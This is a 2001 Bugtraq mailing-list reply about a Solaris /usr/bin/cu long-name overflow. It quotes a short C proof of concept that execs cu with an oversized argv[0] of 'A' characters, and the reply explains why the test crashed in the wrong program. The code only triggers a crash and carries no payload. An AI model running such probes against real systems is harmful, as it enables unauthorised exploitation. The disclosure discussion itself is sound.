Bugtraq mailing list archives
Re: Solaris /usr/bin/cu Vulnerability
From: optyx <optyx () UBERHAX0R NET>
Date: Tue, 30 Jan 2001 12:01:10 -0800
Dan Harkless <dan-bugtraq () DILVISH SPEED NET> wrote:
Are you implying the above patches fix the cu long hardlink name
vulnerability? This is not the case, at least on 2.6:
# cat > cu_exploit.c
#include <stdio.h>
void main(int argc,char **argv)
{
char *buf;
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/usr/bin/cu",buf,(char *)0);
}
# gcc cu_exploit.c
cu_exploit.c: In function `main':
cu_exploit.c:4: warning: return type of `main' is not `int'
# a.out
Segmentation fault
see that atoi(argv[1])? a.out crashed not /usr/bin/cu. try a.out 4000 or whatever number next time, or trace through it with gdb. -Optyx, Uberhax0r Communications http://www.uberhax0r.net, leeter than dog
Current thread:
- Solaris /usr/bin/cu Vulnerability Pablo Sor (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Casper Dik (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Solaris /usr/bin/cu Vulnerability hal King (Jan 23)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 30)
- <Possible follow-ups>
- Re: Solaris /usr/bin/cu Vulnerability Konrad Rieck (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Wietse Venema (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability optyx (Jan 30)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 31)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)